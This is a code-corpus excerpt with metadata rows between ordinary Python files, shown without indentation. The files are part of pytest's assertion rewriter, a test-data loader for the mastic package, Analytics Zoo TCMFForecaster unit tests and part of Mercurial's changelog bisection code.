or item.level > 0
or item.module != "__future__"
):
lineno = item.lineno
break
pos += 1
else:
lineno = item.lineno
imports = [
ast.Import([alias], lineno=lineno, col_offset=0) for alias in aliases
]
mod.body[pos:pos] = imports
# Collect asserts.
nodes = [mod]
while nodes:
node = nodes.pop()
for name, field in ast.iter_fields(node):
if isinstance(field, list):
new = []
for i, child in enumerate(field):
if isinstance(child, ast.Assert):
# Transform assert.
new.extend(self.visit(child))
else:
new.append(child)
if isinstance(child, ast.AST):
nodes.append(child)
setattr(node, name, new)
elif (
isinstance(field, ast.AST)
# Don't recurse into expressions as they can't contain
# asserts.
and not isinstance(field, ast.expr)
):
nodes.append(field)
@staticmethod
def is_rewrite_disabled(docstring):
return "PYTEST_DONT_REWRITE" in docstring
def variable(self):
"""Get a new variable."""
# Use a character invalid in python identifiers to avoid clashing.
name = "@py_assert" + str(next(self.variable_counter))
self.variables.append(name)
return name
def assign(self, expr):
"""Give *expr* a name."""
name = self.variable()
self.statements.append(ast.Assign([ast.Name(name, ast.Store())], expr))
return ast.Name(name, ast.Load())
def display(self, expr):
"""Call saferepr on the expression."""
return self.helper("saferepr", expr)
def helper(self, name, *args):
"""Call a helper in this module."""
py_name = ast.Name("@pytest_ar", ast.Load())
attr = ast.Attribute(py_name, "_" + name, ast.Load())
return ast_Call(attr, list(args), [])
def builtin(self, name):
"""Return the builtin called *name*."""
builtin_name = ast.Name("@py_builtins", ast.Load())
return ast.Attribute(builtin_name, name, ast.Load())
def explanation_param(self, expr):
"""Return a new named %-formatting placeholder for expr.
This creates a %-formatting placeholder for expr in the
current formatting context, e.g. ``%(py0)s``. The placeholder
and expr are placed in the current format context so that it
can be used on the next call to .pop_format_context().
"""
specifier = "py" + str(next(self.variable_counter))
self.explanation_specifiers[specifier] = expr
return "%(" + specifier + ")s"
def push_format_context(self):
"""Create a new formatting context.
The format context is used for when an explanation wants to
have a variable value formatted in the assertion message. In
this case the value required can be added using
.explanation_param(). Finally .pop_format_context() is used
to format a string of %-formatted values as added by
.explanation_param().
"""
self.explanation_specifiers = {}
self.stack.append(self.explanation_specifiers)
def pop_format_context(self, expl_expr):
"""Format the %-formatted string with current format context.
The expl_expr should be an ast.Str instance constructed from
the %-placeholders created by .explanation_param(). This will
add the required code to format said string to .on_failure and
return the ast.Name instance of the formatted string.
"""
current = self.stack.pop()
if self.stack:
self.explanation_specifiers = self.stack[-1]
keys = [ast.Str(key) for key in current.keys()]
format_dict = ast.Dict(keys, list(current.values()))
form = ast.BinOp(expl_expr, ast.Mod(), format_dict)
name = "@py_format" + str(next(self.variable_counter))
self.on_failure.append(ast.Assign([ast.Name(name, ast.Store())], form))
return ast.Name(name, ast.Load())
def generic_visit(self, node):
"""Handle expressions we don't have custom code for."""
assert isinstance(node, ast.expr)
res = self.assign(node)
return res, self.explanation_param(self.display(res))
def visit_Assert(self, assert_):
"""Return the AST statements to replace the ast.Assert instance.
This rewrites the test of an assertion to provide
intermediate values and replace it with an if statement which
raises an assertion error with a detailed explanation in case
the expression is false.
"""
if isinstance(assert_.test, ast.Tuple) and len(assert_.test.elts) >= 1:
from _pytest.warning_types import PytestWarning
import warnings
warnings.warn_explicit(
PytestWarning("assertion is always true, perhaps remove parentheses?"),
category=None,
filename=str(self.module_path),
lineno=assert_.lineno,
)
self.statements = []
self.variables = []
self.variable_counter = itertools.count()
self.stack = []
self.on_failure = []
self.push_format_context()
# Rewrite assert into a bunch of statements.
top_condition, explanation = self.visit(assert_.test)
# If in a test module, check if directly asserting None, in order to warn [Issue #3191]
if self.module_path is not None:
self.statements.append(
self.warn_about_none_ast(
top_condition, module_path=self.module_path, lineno=assert_.lineno
)
)
# Create failure message.
body = self.on_failure
negation = ast.UnaryOp(ast.Not(), top_condition)
self.statements.append(ast.If(negation, body, []))
if assert_.msg:
assertmsg = self.helper("format_assertmsg", assert_.msg)
explanation = "\n>assert " + explanation
else:
assertmsg = ast.Str("")
explanation = "assert " + explanation
template = ast.BinOp(assertmsg, ast.Add(), ast.Str(explanation))
msg = self.pop_format_context(template)
fmt = self.helper("format_explanation", msg)
err_name = ast.Name("AssertionError", ast.Load())
exc = ast_Call(err_name, [fmt], [])
if sys.version_info[0] >= 3:
raise_ = ast.Raise(exc, None)
else:
raise_ = ast.Raise(exc, None, None)
body.append(raise_)
# Clear temporary variables by setting them to None.
if self.variables:
variables = [ast.Name(name, ast.Store()) for name in self.variables]
clear = ast.Assign(variables, _NameConstant(None))
self.statements.append(clear)
# Fix line numbers.
for stmt in self.statements:
set_location(stmt, assert_.lineno, assert_.col_offset)
return self.statements
def warn_about_none_ast(self, node, module_path, lineno):
"""
Returns an AST issuing a warning if the value of node is `None`.
This is used to warn the user when asserting a function that asserts
internally already.
See issue #3191 for more details.
"""
# Using parse because it is different between py2 and py3.
AST_NONE = ast.parse("None").body[0].value
val_is_none = ast.Compare(node, [ast.Is()], [AST_NONE])
send_warning = ast.parse(
"""
from _pytest.warning_types import PytestWarning
from warnings import warn_explicit
warn_explicit(
PytestWarning('asserting the value None, please use "assert is None"'),
category=None,
filename={filename!r},
lineno={lineno},
)
""".format(
filename=module_path.strpath, lineno=lineno
)
).body
return ast.If(val_is_none, send_warning, [])
def visit_Name(self, name):
# Display the repr of the name if it's a local variable or
# _should_repr_global_name() thinks it's acceptable.
locs = ast_Call(self.builtin("locals"), [], [])
inlocs = ast.Compare(ast.Str(name.id), [ast.In()], [locs])
dorepr = self.helper("should_repr_global_name", name)
test = ast.BoolOp(ast.Or(), [inlocs, dorepr])
expr = ast.IfExp(test, self.display(name), ast.Str(name.id))
return name, self.explanation_param(expr)
def visit_BoolOp(self, boolop):
res_var = self.variable()
expl_list = self.assign(ast.List([], ast.Load()))
app = ast.Attribute(expl_list, "append", ast.Load())
is_or = int(isinstance(boolop.op, ast.Or))
body = save = self.statements
fail_save = self.on_failure
levels = len(boolop.values) - 1
self.push_format_context()
# Process each operand, short-circuting if needed.
for i, v in enumerate(boolop.values):
if i:
fail_inner = []
# cond is set in a prior loop iteration below
self.on_failure.append(ast.If(cond, fail_inner, [])) # noqa
self.on_failure = fail_inner
self.push_format_context()
res, expl = self.visit(v)
body.append(ast.Assign([ast.Name(res_var, ast.Store())], res))
expl_format = self.pop_format_context(ast.Str(expl))
call = ast_Call(app, [expl_format], [])
self.on_failure.append(ast.Expr(call))
if i < levels:
cond = res
if is_or:
cond = ast.UnaryOp(ast.Not(), cond)
inner = []
self.statements.append(ast.If(cond, inner, []))
self.statements = body = inner
self.statements = save
self.on_failure = fail_save
expl_template = self.helper("format_boolop", expl_list, ast.Num(is_or))
expl = self.pop_format_context(expl_template)
return ast.Name(res_var, ast.Load()), self.explanation_param(expl)
def visit_UnaryOp(self, unary):
pattern = unary_map[unary.op.__class__]
operand_res, operand_expl = self.visit(unary.operand)
res = self.assign(ast.UnaryOp(unary.op, operand_res))
return res, pattern % (operand_expl,)
def visit_BinOp(self, binop):
symbol = binop_map[binop.op.__class__]
left_expr, left_expl = self.visit(binop.left)
right_expr, right_expl = self.visit(binop.right)
explanation = "(%s %s %s)" % (left_expl, symbol, right_expl)
res = self.assign(ast.BinOp(left_expr, binop.op, right_expr))
return res, explanation
def visit_Call_35(self, call):
"""
visit `ast.Call` nodes on Python3.5 and after
"""
new_func, func_expl = self.visit(call.func)
arg_expls = []
new_args = []
new_kwargs = []
for arg in call.args:
res, expl = self.visit(arg)
arg_expls.append(expl)
new_args.append(res)
for keyword in call.keywords:
res, expl = self.visit(keyword.value)
new_kwargs.append(ast.keyword(keyword.arg, res))
if keyword.arg:
arg_expls.append(keyword.arg + "=" + expl)
else: # **args have `arg` keywords with an .arg of None
arg_expls.append("**" + expl)
expl = "%s(%s)" % (func_expl, ", ".join(arg_expls))
new_call = ast.Call(new_func, new_args, new_kwargs)
res = self.assign(new_call)
res_expl = self.explanation_param(self.display(res))
outer_expl = "%s\n{%s = %s\n}" % (res_expl, res_expl, expl)
return res, outer_expl
def visit_Starred(self, starred):
# From Python 3.5, a Starred node can appear in a function call
res, expl = self.visit(starred.value)
new_starred = ast.Starred(res, starred.ctx)
return new_starred, "*" + expl
def visit_Call_legacy(self, call):
"""
visit `ast.Call nodes on 3.4 and below`
"""
new_func, func_expl = self.visit(call.func)
arg_expls = []
new_args = []
new_kwargs = []
new_star = new_kwarg = None
for arg in call.args:
res, expl = self.visit(arg)
new_args.append(res)
arg_expls.append(expl)
for keyword in call.keywords:
res, expl = self.visit(keyword.value)
new_kwargs.append(ast.keyword(keyword.arg, res))
arg_expls.append(keyword.arg + "=" + expl)
if call.starargs:
new_star, expl = self.visit(call.starargs)
arg_expls.append("*" + expl)
if call.kwargs:
new_kwarg, expl = self.visit(call.kwargs)
arg_expls.append("**" + expl)
expl = "%s(%s)" % (func_expl, ", ".join(arg_expls))
new_call = ast.Call(new_func, new_args, new_kwargs, new_star, new_kwarg)
res = self.assign(new_call)
res_expl = self.explanation_param(self.display(res))
outer_expl = "%s\n{%s = %s\n}" % (res_expl, res_expl, expl)
return res, outer_expl
# ast.Call signature changed on 3.5,
# conditionally change which methods is named
# visit_Call depending on Python version
if sys.version_info >= (3, 5):
visit_Call = visit_Call_35
else:
visit_Call = visit_Call_legacy
def visit_Attribute(self, attr):
if not isinstance(attr.ctx, ast.Load):
return self.generic_visit(attr)
value, value_expl = self.visit(attr.value)
res = self.assign(ast.Attribute(value, attr.attr, ast.Load()))
res_expl = self.explanation_param(self.display(res))
pat = "%s\n{%s = %s.%s\n}"
expl = pat % (res_expl, res_expl, value_expl, attr.attr)
return res, expl
def visit_Compare(self, comp):
self.push_format_context()
left_res, left_expl = self.visit(comp.left)
if isinstance(comp.left, (ast.Compare, ast.BoolOp)):
left_expl = "({})".format(left_expl)
res_variables = [self.variable() for i in range(len(comp.ops))]
load_names = [ast.Name(v, ast.Load()) for v in res_variables]
store_names = [ast.Name(v, ast.Store()) for v in res_variables]
it = zip(range(len(comp.ops)), comp.ops, comp.comparators)
expls = []
syms = []
results = [left_res]
for i, op, next_operand in it:
next_res, next_expl = self.visit(next_operand)
if isinstance(next_operand, (ast.Compare, ast.BoolOp)):
next_expl = "({})".format(next_expl)
results.append(next_res)
sym = binop_map[op.__class__]
syms.append(ast.Str(sym))
expl = "%s %s %s" % (left_expl, sym, next_expl)
expls.append(ast.Str(expl))
res_expr = ast.Compare(left_res, [op], [next_res])
self.statements.append(ast.Assign([store_names[i]], res_expr))
left_res, left_expl = next_res, next_expl
# Use pytest.assertion.util._reprcompare if that's available.
expl_call = self.helper(
"call_reprcompare",
ast.Tuple(syms, ast.Load()),
ast.Tuple(load_names, ast.Load()),
ast.Tuple(expls, ast.Load()),
ast.Tuple(results, ast.Load()),
)
if len(comp.ops) > 1:
res = ast.BoolOp(ast.And(), load_names)
else:
res = load_names[0]
return res, self.explanation_param(self.pop_format_context(expl_call))
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/_pytest/assertion/rewrite.py
|
Python
|
mit
| 41,131
|
[
"VisIt"
] |
bb3e4eb2af604f374286ce29081eda2b73f4739ea8c7a58c931f977e08cc3365
|
from io import StringIO
import sys
import os.path as osp
import pickle
# get the path to this module directory
data_dir = osp.dirname(sys.modules[__name__].__file__)
BEN_file_name = "3ptb_BEN.pdb"
trypsin_file_name = "3ptb_trypsin.pdb"
waters_3ptb_file_name = "3ptb_water.pdb"
BEN_Hs_file_name = "BEN+Hs_3ptb.pdb"
trypsin_Hs_file_name = "trypsin+Hs_3ptb.pdb"
benzamidine_file_name = "benzamidine.mol"
# sEH_Hs_file_name = "sEH_Hs.pdb"
# TPPU_Hs_file_name = "TPPU_Hs.pdb"
Top7_file_name = "Top7_1qys.pdb"
chignolin_file_name = "chignolin_5awl.pdb"
ligand_structure_files = [BEN_file_name, BEN_Hs_file_name]
protein_structure_files = [trypsin_file_name, trypsin_Hs_file_name,
Top7_file_name, chignolin_file_name]
solvent_files = [waters_3ptb_file_name]
structure_files = ligand_structure_files + protein_structure_files + solvent_files
# load each data example as a string
BEN_path = osp.join(data_dir, BEN_file_name)
with open(BEN_path, 'r') as rf:
BEN_3ptb = rf.read()
BEN_Hs_path = osp.join(data_dir, BEN_Hs_file_name)
with open(BEN_Hs_path, 'r') as rf:
BEN_Hs_3ptb = rf.read()
benzamidine_MOL_path = osp.join(data_dir, benzamidine_file_name)
with open(benzamidine_MOL_path, 'r') as rf:
benzamidine_MOL = rf.read()
trypsin_path = osp.join(data_dir, trypsin_file_name)
with open(trypsin_path, 'r') as rf:
trypsin_3ptb = rf.read()
trypsin_Hs_path = osp.join(data_dir, trypsin_Hs_file_name)
with open(trypsin_Hs_path, 'r') as rf:
trypsin_Hs_3ptb = rf.read()
waters_3ptb_path = osp.join(data_dir, waters_3ptb_file_name)
with open(waters_3ptb_path, 'r') as rf:
waters_3ptb = rf.read()
# sEH_Hs_path = osp.join(data_dir, sEH_Hs_file_name)
# with open(sEH_Hs_path, 'r') as rf:
# sEH_Hs_3ptb = rf.read()
# TPPU_Hs_path = osp.join(data_dir, TPPU_Hs_file_name)
# with open(TPPU_Hs_path, 'r') as rf:
# TPPU_Hs_3ptb = rf.read()
Top7_path = osp.join(data_dir, Top7_file_name)
with open(Top7_path, 'r') as rf:
Top7_1qys = rf.read()
chignolin_path = osp.join(data_dir, chignolin_file_name)
with open(chignolin_path, 'r') as rf:
chignolin_5awl = rf.read()
# precomputed molecules with features already detected
# from rdkit feature detection
trypsin_mastmol_path = osp.join(data_dir, "trypsin+features_mastmol.pkl")
with open(trypsin_mastmol_path, 'rb') as pkl_rf:
Trypsin_Molecule = pickle.load(pkl_rf)
# BEN_mastmol_path = osp.join(data_dir, "BEN+features_mastmol.pkl")
# with open(BEN_mastmol_path, 'rb') as pkl_rf:
# BEN_Molecule = pickle.load(pkl_rf)
trypsin_Hs_mastmol_path = osp.join(data_dir, "trypsin+Hs+features_mastmol.pkl")
with open(trypsin_mastmol_path, 'rb') as pkl_rf:
Trypsin_Hs_Molecule = pickle.load(pkl_rf)
# BEN_Hs_mastmol_path = osp.join(data_dir, "BEN+Hs+features_mastmol.pkl")
# with open(BEN_Hs_mastmol_path, 'rb') as pkl_rf:
# BEN_Hs_Molecule = pickle.load(pkl_rf)
# sEH_Hs_mastmol_path = osp.join(data_dir, "sEH+Hs+features_mastmol.pkl")
# with open(sEH_Hs_mastmol_path, 'rb') as pkl_rf:
# sEH_Hs_Molecule = pickle.load(pkl_rf)
# TPPU_Hs_mastmol_path = osp.join(data_dir, "TPPU+Hs+features_mastmol.pkl")
# with open(TPPU_Hs_mastmol_path, 'rb') as pkl_rf:
# TPPU_Hs_Molecule = pickle.load(pkl_rf)
# a SystemType for Tryspin-Benzamidine
Trypsin_Benzamidine_SystemType_path = osp.join(data_dir, "Trypsin_Benzamidine_SystemType.pkl")
with open(Trypsin_Benzamidine_SystemType_path, 'rb') as pkl_rf:
Trypsin_Benzamidine_SystemType = pickle.load(pkl_rf)
# a substantiation of the Trypsin-Benzamidine SystemType from crystal
# structure coordinates
Trypsin_Benzamidine_System_cryst_path = osp.join(data_dir, "Trypsin_Benzamidine_System_cryst.pkl")
with open(Trypsin_Benzamidine_System_cryst_path, 'rb') as pkl_rf:
Trypsin_Benzamidine_System_cryst = pickle.load(pkl_rf)
|
salotz/mast
|
mastic/tests/data/__init__.py
|
Python
|
mit
| 3,805
|
[
"CRYSTAL",
"RDKit"
] |
9b6f93ac9bedb1ce89472638ad7af90e43f8dc52b32341ea92dc2bb637814563
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
import numpy as np
from zoo.chronos.forecaster.tcmf_forecaster import TCMFForecaster
from unittest import TestCase
import tempfile
import pandas as pd
class TestChronosModelTCMFForecaster(TestCase):
def setUp(self):
self.model = TCMFForecaster()
self.num_samples = 300
self.horizon = np.random.randint(1, 50)
self.seq_len = 480
self.data = np.random.rand(self.num_samples, self.seq_len)
self.id = np.arange(self.num_samples)
self.data_new = np.random.rand(self.num_samples, self.horizon)
self.fit_params = dict(val_len=12,
start_date="2020-1-1",
freq="5min",
y_iters=1,
init_FX_epoch=1,
max_FX_epoch=1,
max_TCN_epoch=1,
alt_iters=2)
def test_forecast_tcmf_ndarray(self):
ndarray_input = {'id': self.id, 'y': self.data}
self.model.fit(ndarray_input, **self.fit_params)
assert not self.model.is_xshards_distributed()
# test predict
yhat = self.model.predict(horizon=self.horizon)
# test save load
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat_loaded = loaded_model.predict(horizon=self.horizon)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
# test evaluate
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value, metric=['mse'])
# test fit_incremental
self.model.fit_incremental({'y': self.data_new}) # 1st time
self.model.fit_incremental({'y': self.data_new}) # 2nd time
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
def test_tcmf_ndarray_covariates_dti(self):
ndarray_input = {'id': self.id, 'y': self.data}
self.model.fit(ndarray_input,
covariates=np.random.rand(3, self.seq_len),
dti=pd.date_range('20130101', periods=self.seq_len),
**self.fit_params)
future_covariates = np.random.randn(3, self.horizon)
future_dti = pd.date_range('20130101', periods=self.horizon)
# test predict
yhat = self.model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
# test save load
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat_loaded = loaded_model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
# test evaluate
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value,
target_covariates=future_covariates,
target_dti=future_dti,
metric=['mse'])
# test fit_incremental
self.model.fit_incremental({'y': self.data_new},
covariates_incr=future_covariates,
dti_incr=future_dti,)
yhat_incr = self.model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
def test_forecast_ndarray_error(self):
# is_xshards_distributed
with self.assertRaises(Exception) as context:
self.model.is_xshards_distributed()
self.assertTrue('You should run fit before calling is_xshards_distributed()'
in str(context.exception))
# fit
input = dict({'data': self.data})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
input = dict({'y': "abc"})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("the value of y should be an ndarray" in str(context.exception))
id_diff = np.arange(200)
input = dict({'id': id_diff, 'y': self.data})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("the length of the id array should be equal to the number of"
in str(context.exception))
input_right = dict({'id': self.id, 'y': self.data})
self.model.fit(input_right, **self.fit_params)
with self.assertRaises(Exception) as context:
self.model.fit(input_right)
self.assertTrue('This model has already been fully trained' in str(context.exception))
# fit_incremental
data_id_diff = {'id': self.id - 1, 'y': self.data_new}
with self.assertRaises(ValueError) as context:
self.model.fit_incremental(data_id_diff)
self.assertTrue('The input ids in fit_incremental differs from input ids in fit'
in str(context.exception))
# evaluate
target_value_fake = dict({"data": self.data_new})
with self.assertRaises(Exception) as context:
self.model.evaluate(target_value=target_value_fake, metric=['mse'])
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
def test_forecast_tcmf_without_id(self):
# construct data
input = dict({'y': self.data})
self.model.fit(input, **self.fit_params)
assert not self.model.is_xshards_distributed()
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat = self.model.predict(horizon=self.horizon)
yhat_loaded = loaded_model.predict(horizon=self.horizon)
assert "id" not in yhat_loaded
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
target_value = dict({"y": self.data_new})
self.model.evaluate(target_value=target_value, metric=['mse'])
self.model.fit_incremental({'y': self.data_new}) # 1st time
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
data_new_id = {'id': self.id, 'y': self.data_new}
with self.assertRaises(ValueError) as context:
self.model.fit_incremental(data_new_id)
self.assertTrue('Got valid id in fit_incremental and invalid id in fit.'
in str(context.exception))
def test_forecast_tcmf_xshards(self):
from zoo.orca import OrcaContext
import zoo.orca.data.pandas
import pandas as pd
OrcaContext.pandas_read_backend = "pandas"
def preprocessing(df, id_name, y_name):
id = df.index
data = df.to_numpy()
result = dict({id_name: id, y_name: data})
return result
def postprocessing(pred_results, output_dt_col_name):
id_arr = pred_results["id"]
pred_results = pred_results["prediction"]
pred_results = np.concatenate((np.expand_dims(id_arr, axis=1), pred_results), axis=1)
final_df = pd.DataFrame(pred_results, columns=["id"] + output_dt_col_name)
final_df.id = final_df.id.astype("int")
final_df = final_df.set_index("id")
final_df.columns.name = "datetime"
final_df = final_df.unstack().reset_index().rename({0: "prediction"}, axis=1)
return final_df
def get_pred(d):
return d["prediction"]
with tempfile.NamedTemporaryFile() as temp:
data = np.random.rand(300, 480)
df = pd.DataFrame(data)
df.to_csv(temp.name)
shard = zoo.orca.data.pandas.read_csv(temp.name)
shard.cache()
shard_train = shard.transform_shard(preprocessing, 'id', 'data')
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
shard_train = shard.transform_shard(preprocessing, 'cid', 'y')
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue("key `id` doesn't exist in x" in str(context.exception))
with self.assertRaises(Exception) as context:
self.model.is_xshards_distributed()
self.assertTrue('You should run fit before calling is_xshards_distributed()'
in str(context.exception))
shard_train = shard.transform_shard(preprocessing, 'id', 'y')
self.model.fit(shard_train, **self.fit_params)
assert self.model.is_xshards_distributed()
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue('This model has already been fully trained' in str(context.exception))
with self.assertRaises(Exception) as context:
self.model.fit_incremental(shard_train)
self.assertTrue('NotImplementedError' in context.exception.__class__.__name__)
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname + "/model")
loaded_model = TCMFForecaster.load(tempdirname + "/model", is_xshards_distributed=True)
horizon = np.random.randint(1, 50)
yhat_shard_origin = self.model.predict(horizon=horizon)
yhat_list_origin = yhat_shard_origin.collect()
yhat_list_origin = list(map(get_pred, yhat_list_origin))
yhat_shard = loaded_model.predict(horizon=horizon)
yhat_list = yhat_shard.collect()
yhat_list = list(map(get_pred, yhat_list))
yhat_origin = np.concatenate(yhat_list_origin)
yhat = np.concatenate(yhat_list)
assert yhat.shape == (300, horizon)
np.testing.assert_equal(yhat, yhat_origin)
output_dt_col_name = pd.date_range(start='2020-05-01', periods=horizon, freq='H').to_list()
yhat_df_shards = yhat_shard.transform_shard(postprocessing, output_dt_col_name)
final_df_list = yhat_df_shards.collect()
final_df = pd.concat(final_df_list)
final_df.sort_values("datetime", inplace=True)
assert final_df.shape == (300 * horizon, 3)
OrcaContext.pandas_read_backend = "spark"
def test_forecast_tcmf_distributed(self):
input = dict({'id': self.id, 'y': self.data})
from zoo.orca import init_orca_context, stop_orca_context
init_orca_context(cores=4, spark_log_level="INFO", init_ray_on_spark=True,
object_store_memory="1g")
self.model.fit(input, num_workers=4, **self.fit_params)
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat = self.model.predict(horizon=self.horizon, num_workers=4)
yhat_loaded = loaded_model.predict(horizon=self.horizon, num_workers=4)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_equal(yhat, yhat_loaded)
self.model.fit_incremental({'y': self.data_new})
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value, metric=['mse'])
stop_orca_context()
if __name__ == "__main__":
pytest.main([__file__])
|
intel-analytics/analytics-zoo
|
pyzoo/test/zoo/chronos/forecaster/test_tcmf_forecaster.py
|
Python
|
apache-2.0
| 14,337
|
[
"ORCA"
] |
05a9b94c77a2ca2dbe9d915bd14bd2b509bbd3c1c28edfab3d70fa6a54631b04
|
# Portions Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# changelog bisection for mercurial
#
# Copyright 2007 Matt Mackall
# Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org>
#
# Inspired by git bisect.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import collections
from . import error, pycompat, util
from .i18n import _
from .node import hex, short
def bisect(repo, state):
"""find the next node (if any) for testing during a bisect search.
returns a (nodes, number, good, badnode, goodnode) tuple, where badnode and
goodnode - borders of the range.
'nodes' is the final result of the bisect if 'number' is 0.
Otherwise 'number' indicates the remaining possible candidates for
the search and 'nodes' contains the next bisect target.
'good' is True if bisect is searching for a first good changeset, False
if searching for a first bad one.
"""
changelog = repo.changelog
clparents = changelog.parentrevs
skip = set([changelog.rev(n) for n in state["skip"]])
def buildancestors(bad, good):
badrev = min([changelog.rev(n) for n in bad])
goodrev = max([changelog.rev(n) for n in good])
ancestors = collections.defaultdict(lambda: None)
for rev in repo.revs("descendants(%ln) - ancestors(%ln)", good, good):
ancestors[rev] = []
if ancestors[badrev] is None:
return badrev, goodrev, None
return badrev, goodrev, ancestors
good = False
badrev, goodrev, ancestors = buildancestors(state["bad"], state["good"])
if not ancestors: # looking for bad to good transition?
good = True
badrev, goodrev, ancestors = buildancestors(state["good"], state["bad"])
bad = changelog.node(badrev)
if not ancestors: # now we're confused
if (
len(state["bad"]) == 1
and len(state["good"]) == 1
and state["bad"] != state["good"]
):
raise error.Abort(_("starting revisions are not directly related"))
raise error.Abort(
_("inconsistent state, %s:%s is good and bad") % (badrev, short(bad))
)
badnode = changelog.node(badrev)
goodnode = changelog.node(goodrev)
# build children dict
children = {}
visit = collections.deque([badrev])
candidates = []
while visit:
rev = visit.popleft()
if ancestors[rev] == []:
candidates.append(rev)
for prev in clparents(rev):
if prev != -1:
if prev in children:
children[prev].append(rev)
else:
children[prev] = [rev]
visit.append(prev)
candidates.sort()
# have we narrowed it down to one entry?
# or have all other possible candidates besides 'bad' have been skipped?
tot = len(candidates)
unskipped = [c for c in candidates if (c not in skip) and (c != badrev)]
if tot == 1 or not unskipped:
return ([changelog.node(c) for c in candidates], 0, good, badnode, goodnode)
perfect = tot // 2
# find the best node to test
best_rev = None
best_len = -1
poison = set()
for rev in candidates:
if rev in poison:
# poison children
poison.update(children.get(rev, []))
continue
a = ancestors[rev] or [rev]
ancestors[rev] = None
x = len(a) # number of ancestors
y = tot - x # number of non-ancestors
value = min(x, y) # how good is this test?
if value > best_len and rev not in skip:
best_len = value
best_rev = rev
if value == perfect: # found a perfect candidate? quit early
break
if y < perfect and rev not in skip: # all downhill from here?
# poison children
poison.update(children.get(rev, []))
continue
for c in children.get(rev, []):
if ancestors[c]:
ancestors[c] = list(set(ancestors[c] + a))
else:
ancestors[c] = a + [c]
assert best_rev is not None
best_node = changelog.node(best_rev)
return ([best_node], tot, good, badnode, goodnode)
def checksparsebisectskip(repo, candidatenode, badnode, goodnode):
"""
Checks if the candidate node can be skipped as the contents haven't changed
within the sparse profile.
goodnode and badnode - borders of the bisect range.
Returns "good" if the node can be skipped as it's the same as goodnode,
"bad" if the node can be skipped as it's the same as badnode, "check" otherwise.
"""
def diffsparsematch(node, diff):
if not util.safehasattr(repo, "sparsematch"):
return True
rev = repo.changelog.rev(node)
sparsematch = repo.sparsematch(rev)
return any(f for f in diff.keys() if sparsematch(f))
badmanifest = repo[badnode].manifest()
bestmanifest = repo[candidatenode].manifest()
goodmanifest = repo[goodnode].manifest()
baddiff = diffsparsematch(candidatenode, badmanifest.diff(bestmanifest))
gooddiff = diffsparsematch(candidatenode, bestmanifest.diff(goodmanifest))
if baddiff and not gooddiff:
return "good"
